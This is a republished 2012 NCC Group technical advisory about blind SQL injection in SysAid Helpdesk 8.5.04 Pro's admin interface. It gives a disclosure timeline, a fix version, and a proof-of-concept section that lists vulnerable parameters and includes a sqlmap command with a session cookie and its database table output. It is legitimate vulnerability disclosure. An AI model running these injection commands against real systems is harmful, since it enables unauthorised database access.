Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28844
HistoryDec 10, 2012 - 12:00 a.m.

NGS000241 Technical Advisory: SysAid Helpdesk Pro Blind SQL Injection

2012-12-1000:00:00
vulners.com
69
JSON

=======
Summary

Name: SysAid Helpdesk Pro - Blind SQL Injection
Release Date: 30 November 2012
Reference: NGS00241
Discoverer: Daniel Compton <[email protected]>
Vendor: SysAid
Vendor Reference:
Systems Affected: SysAid Helpdesk 8.5 Pro
Risk: High
Status: Published

========
TimeLine

Discovered: 12 March 2012
Released: 12 March 2012
Approved: 12 March 2012
Reported: 14 March 2012
Fixed: 1 August 2012
Published: 30 November 2012

===========
Description

SysAid Helpdesk V8.5.04 Pro Edition - Blind SQL Injection within the administrator interface. This is a commercial product.

I. VULNERABILITY

SysAid Helpdesk V8.5.04 Pro suffers from Blind SQL injection several pages and parameters. This is exploitable as an authenticated user of the admin interface.

II. BACKGROUND

SyAid is a fully web based helpdesk solution.

http://www.ilient.com/

III. DESCRIPTION

SQL injection has been found and exploited/confirmed within the software as an authenticated user. This is the latest version of SysAid Helpdesk.

=================
Technical Details

IV. PROOF OF CONCEPT

The following URL and parameters have been confirmed to suffer from Blind SQL injection.

/AssetManagementList.jsp (GET Parameter: computerID, group1)
AssetManagementChart.jsp (GET Parameter: group1)
/genericreport (POST Parameter: assetID, customSQL, groupFilter)
CIEdit.jsp (POST Parameter: newClcleared, paelBtnArrayButtons)

/AssetManagementList.jsp?resetParams=YES&noframe=YES&group1=&group1Name=computer_type&group2=&group2Name=null&computerID=null'&viewName=Servers%20and%20Network%20devices

python sqlmap.py
–url="http://192.168.1.149:8080/AssetManagementList.jsp?resetParams=YES&amp;noframe=YES&amp;group1=&amp;group1Name=computer_type&amp;group2=&amp;group2Name=null&amp;computerID=null&amp;viewName=Servers&#37;20and&#37;20Network&#37;20devices&quot;
–dbms=mysql -p computerID
–cookie="JSESSIONID=1CDC74FF018EE7C2C0CDD3FE54DB79F2" -D ilient --level=5

Database: ilient [10 tables]
±----------------------+
| account |
| agreement |
| asset2ci |
| asset_catalog |
| asset_catalog_files |
| asset_catalog_history |
| asset_catalog_links |
| asset_data_day_data |
| asset_data_month_data |
| asset_data_week_data |
±----------------------+

===============
Fix Information

Fixed in version 8.5.08

http://www.sysaid.com/bugs-fixed-8-5.htm#8508

Download Product Patch:

http://cdn3.sysaid.com/SysAidServerPatchFreev8.5.08.exe

NCC Group Research
http://www.nccgroup.com/research

For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>

JSON